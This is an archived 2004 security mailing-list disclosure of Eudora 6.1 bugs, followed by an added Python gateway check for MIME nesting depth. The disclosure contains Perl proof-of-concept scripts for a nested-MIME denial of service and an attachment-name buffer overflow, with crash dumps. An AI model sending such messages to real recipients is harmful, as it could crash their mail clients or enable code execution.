[Full-Disclosure] Eudora 6.1 is evil

From: Paul Szabo (psz_at_maths.usyd.edu.au)
Date: 04/19/04

    To: NTBugtraq@listserv.ntbugtraq.com, beckley@qualcomm.com, bugtraq@securityfocus.com, full-disclosure@lists.netsys.com
    Date: Tue, 20 Apr 2004 07:57:36 +1000 (EST)
    
    

    Eudora 6.1 on Windows is evil - have tested "Light Mode" (free) only so
    far, do not know if "Sponsored Mode" or "Paid Mode" would be any different.
    (Do not use: stay away from Eudora, or maybe use version 6.0.3.)

    ---
    Attachment spoof, LaunchProtect:
      http://lists.netsys.com/pipermail/full-disclosure/2004-March/018897.html
    Works (i.e. broken) same as the 6.0.3 version.
    ---
    Nested MIME DoS:
      http://lists.netsys.com/pipermail/full-disclosure/2004-April/020075.html
    Works "better" than the 6.0.3 version, crashes at 580 levels:
    #!/usr/bin/perl --
    print "From: me\n";
    print "To: you\n";
    print "Subject: nested multipart test\n";
    print "Mime-Version: 1.0\n";
    print "X-Use: Pipe the output of this script into:  sendmail -i victim\n";
    &nest(0);
    print "\n";
    #
    sub nest {
      my ($x) = @_;
      my $b = sprintf("bndry%04d",$x);
      print "Content-Type: multipart/mixed; boundary=\"$b\"\n\n";
      print "--$b\n";
      print "Content-Type: text/plain\n\n";
      print "Level $x\n\n";
    # No problem for 570, but crash for 580 deep nesting:
    # 
    # (444.458): Stack overflow - code c00000fd (first chance)
    # First chance exceptions are reported before any exception handling.
    # This exception may be expected and handled.
    # eax=00000409 ebx=00000001 ecx=00000000 edx=00000001 esi=00033494 edi=62000000
    # eip=77f862ed esp=00032afc ebp=0003339c iopl=0         nv up ei pl nz na po nc
    # cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010206
    # ntdll!LdrLoadAlternateResourceModule+9:
    # 77f862ed 53               push    ebx
      if ($x < 580) {
        print "--$b\n";
        &nest($x+1);
      }
      print "--$b\n";
      print "Content-Type: text/plain\n\n";
      print "Final $x\n";
      print "--$b--\n\n";
    }
    ---
    "Long attachment spoof" execute-any-code bug:
      http://lists.netsys.com/pipermail/full-disclosure/2003-September/010029.html
    from version 6.0 and previous (but apparently fixed in 6.0.1 and 6.0.3) is
    back:
    #!/usr/bin/perl --
    print "From: me\n";
    print "To: you\n";
    print "Subject: Eudora 6.1 buffer overflow demo\n";
    print "X-Use: Pipe the output of this script into:  sendmail -i victim\n\n";
    print "Long spoofed attachments cause an exploitable buffer overflow:\n";
    # (298.40c): Access violation - code c0000005 (first chance)
    # First chance exceptions are reported before any exception handling.
    # This exception may be expected and handled.
    # eax=800403e9 ebx=00000005 ecx=41414141 edx=00a22040 esi=00002966 edi=026a65b4
    # eip=41414141 esp=0012f65c ebp=41414141 iopl=0         nv up ei ng nz ac pe cy
    # cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010293
    # 41414141 ??               ???
    print "Attachment Converted\r: ", "A"x300,"\n\n";
    ---
    Cheers,
    Paul Szabo - psz@maths.usyd.edu.au  http://www.maths.usyd.edu.au:8000/u/psz/
    School of Mathematics and Statistics  University of Sydney   2006  Australia
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
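
A gateway-side check for the nested MIME case described in the post, as an added example that is not part of the original message and not Eudora's own code. It measures multipart nesting with an explicit stack rather than recursion, so a deeply nested message cannot exhaust the checker's own stack. The names `multipart_depth`, `accept`, `nested_sample` and `MAX_DEPTH` are chosen for this example, and the limit of 32 is an assumed policy value.

```python
import re

# boundary parameter of a Content-Type header, quoted or bare
BOUNDARY_RE = re.compile(r'boundary\s*=\s*(?:"([^"]+)"|([^\s;]+))', re.I)
MAX_DEPTH = 32  # assumed policy value, not taken from the post

def multipart_depth(raw, limit=MAX_DEPTH):
    """Deepest multipart nesting in raw, tracked with an explicit stack
    (no recursion). Stops early past limit, so result <= limit + 1."""
    stack = []         # boundaries of the multiparts currently open
    deepest = 0
    in_headers = True  # a message starts with its header block
    header = ""        # current header with folded lines joined
    for line in raw.splitlines():
        if in_headers:
            if header and line[:1] in (" ", "\t"):
                header += " " + line.strip()  # folded continuation line
                continue
            low = header.lower()  # previous header is now complete
            if low.startswith("content-type:") and "multipart/" in low:
                m = BOUNDARY_RE.search(header)
                if m:
                    stack.append(m.group(1) or m.group(2))
                    deepest = max(deepest, len(stack))
                    if deepest > limit:
                        return deepest
            header = line
            in_headers = line != ""  # blank line ends the header block
        elif line.startswith("--"):
            token = line[2:].rstrip()
            if token in stack:  # delimiter: next part of an open multipart
                del stack[stack.index(token) + 1:]  # drop unclosed children
                in_headers, header = True, ""
            elif token.endswith("--") and token[:-2] in stack:
                del stack[stack.index(token[:-2]):]  # closing delimiter
    return deepest

def accept(raw, limit=MAX_DEPTH):
    """True if the message stays within the nesting limit."""
    return multipart_depth(raw, limit) <= limit

def nested_sample(levels):
    """Constructed input: levels multiparts nested inside each other."""
    names = ["bndry%04d" % i for i in range(levels)]
    head = "From: me\nTo: you\nMime-Version: 1.0\n"
    opens = "".join('Content-Type: multipart/mixed; boundary="%s"\n\n--%s\n'
                    % (b, b) for b in names)
    closes = "".join("--%s--\n" % b for b in reversed(names))
    return head + opens + "Content-Type: text/plain\n\nhello\n" + closes
```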
    
